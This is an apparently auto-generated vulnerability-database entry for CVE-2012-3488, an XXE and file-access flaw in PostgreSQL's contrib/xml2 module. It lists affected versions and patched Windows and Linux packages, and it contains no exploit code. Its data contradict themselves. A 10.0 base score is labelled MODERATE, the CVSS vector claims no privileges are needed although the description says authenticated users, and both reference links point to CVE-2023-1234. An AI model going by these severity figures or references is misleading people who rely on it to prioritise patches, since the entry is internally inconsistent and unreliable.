CVE-2012-3488
Description
The libxslt support in contrib/xml2 in PostgreSQL 8.3 before 8.3.20, 8.4 before 8.4.13, 9.0 before 9.0.9, and 9.1 before 9.1.5 does not properly restrict access to files and URLs, which allows remote authenticated users to modify data, obtain sensitive information, or trigger outbound traffic to arbitrary external hosts by leveraging (1) stylesheet commands that are permitted by the libxslt security options or (2) an xslt_process feature, related to an XML External Entity (aka XXE) issue.
Risk Information
Base Score
10.0
MODERATE
Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS Score
Exploitation Probability
0.2
Associated Vulnerability
| Vulnerability | OS Platform |
|---|---|
| Vulnerability CVE-2012-3488,CVE-2012-3489 are affected in Postgresql 9.1.4 | Windows |
| Vulnerabilities CVE-2012-3489,CVE-2012-3488 are fixed in PostgreSQL 9.1.5 | Windows |
| Vulnerabilities CVE-2012-3489,CVE-2012-3488 are fixed in PostgreSQL 9.0.9 | Windows |
| Vulnerabilities CVE-2012-3489,CVE-2012-3488 are fixed in PostgreSQL 8.4.13 | Windows |
| Vulnerabilities CVE-2012-3489,CVE-2012-3488 are fixed in PostgreSQL 8.3.20 | Windows |
| Vulnerability CVE-2012-3488,CVE-2012-3489 are affected in Postgresql 9.1.4 (For Linux) | Linux |
| Vulnerabilities CVE-2012-3489,CVE-2012-3488 are fixed in PostgreSQL 9.1.5 (For Linux) | Linux |
| Vulnerabilities CVE-2012-3489,CVE-2012-3488 are fixed in PostgreSQL 9.0.9 (For Linux) | Linux |
| Vulnerabilities CVE-2012-3489,CVE-2012-3488 are fixed in PostgreSQL 8.4.13 (For Linux) | Linux |
| Vulnerabilities CVE-2012-3489,CVE-2012-3488 are fixed in PostgreSQL 8.3.20 (For Linux) | Linux |
| Postgresql-server update (ELSA-2024-10882) postgresql-server-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-pltcl update (ELSA-2024-10882) postgresql-pltcl-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-plpython update (ELSA-2024-10882) postgresql-plpython-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-plperl update (ELSA-2024-10882) postgresql-plperl-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-libs update (ELSA-2024-10882) postgresql-libs-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-libs update (ELSA-2024-10882) postgresql-libs-9.2.24-9.0.3.el7_9.i686.rpm | Linux |
| Postgresql-docs update (ELSA-2024-10882) postgresql-docs-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-devel update (ELSA-2024-10882) postgresql-devel-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql-devel update (ELSA-2024-10882) postgresql-devel-9.2.24-9.0.3.el7_9.i686.rpm | Linux |
| Postgresql-contrib update (ELSA-2024-10882) postgresql-contrib-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql update (ELSA-2024-10882) postgresql-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
| Postgresql update (ELSA-2024-10882) postgresql-9.2.24-9.0.3.el7_9.i686.rpm | Linux |
| Postgresql-test update (ELSA-2024-10882) postgresql-test-9.2.24-9.0.3.el7_9.x86_64.rpm | Linux |
Patch Details
No records foundReferences
https://nvd.nist.gov/vuln/detail/CVE-2023-1234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1234